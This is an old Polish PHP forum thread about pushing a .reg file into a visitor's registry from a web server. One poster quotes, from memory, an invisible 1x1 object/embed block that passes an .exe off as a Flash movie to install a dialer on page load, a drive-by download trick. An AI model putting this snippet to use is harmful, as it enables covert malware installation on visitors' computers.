Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Jak to zrobić w PHP
Forum PHP.pl > Forum > PHP
mis_polarny
Witam! nie długo uruchomie serwis zawierający pomoc i serwis online.
Jak zrobić w php aby np. mając plik z rozszerzeniem .reg na serwerze załadował się u klienta bez sciągania go na dysk lokalny.
Pozdrawiam
rolleyes.gif
scanner
php to server-side. Nie miesza u klienta wzaden sposób.
DeyV
wydaje mi sie, ze można by, bawiąc sie z headerami, doprowadzić do otwarcia takiego pliku, tak jak pliki textowe, lub z HTML'em
Tj. podać jako typ pliku text, (lub html), podajac jednak prawdziwą nazwę.
[php:1:8bdb36a1c0]<?php
header("Content-Type: text/html"); <BR>
header("Content-Disposition: attachment; filename=nazwa_pliku.reg");

readfile($adres_pliku);

?>[/php:1:8bdb36a1c0]
ale to tylko przypuszczenia...
scanner
Hmm....
Myślisz że to by zadziałało?
Wydaje mi się, że powinny zadziałać te wychwalane zabezpiecznenia systemu.
Trzeba by spróbować w sumie. Ale i tak mam wątpliwości.
DeyV
oczywiste jest, że nie taki plik nie załaduje się do rejestru.
Być moze jednak będzie można go normalnie przejżeć...
scanner
Tak, ale:
Cytat
plik z rozszerzeniem .reg na serwerze załadował się u klienta bez sciągania go na dysk lokalny.
Wątpię, żeby zdalnie dało się wprowadzić wartość do rejestru.
Jabol
a może przez aplet javy? Słyszałem, że można apletem sformatować dysk, więc rejestry nie powinny być problemem!
scanner
JAVA i JS może sibie z tym poradzą. Ale to już temat na inne forum.
spenalzo
Więc tak - kiedyś poświęciłem trochę czasu na sprawdzenie czy dialer może automatycznie się załadować i uruchomić. I okazało się, że jest to możliwe w bardzo prosty sposób :-) Ale nie będe pisał jak to zrobić tongue.gif
Jabol
czemu nie? przecież to forum jest poto, żeby dzielić się wiedzą z innymi. Napisz...
spenalzo
No dobra. Piszę to na waszą odpowiedzialność.
Więc oglądawszy pewną stronę biggrin.gif (nie żebym zawsze, tylko w powyższym celu) załadował mi się rzeczony dialer, więc zajrzałem zaraz w kod tej strony i zobaczyłem coś takiego:
Kod
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="1" height="1">

<param name=movie value="plik.exe">

<param name=quality value=high>

<embed src="plik.exe" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="1" height="1">

</embed></object>

Nie wiem, czy to dokładnie tak było, ale coś w tym styu.
spenalzo
Nie wiem czy to działa, ale tamten kod jakby właśne podszywał się pod Flasha. W każdym razie program załadował się i siedział na pasku systemowym dopóki go nie wywaliłem z rejestru i katalogu win/system. A nazwa podszywał się pod jakiś program windowsowy, kanalia.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.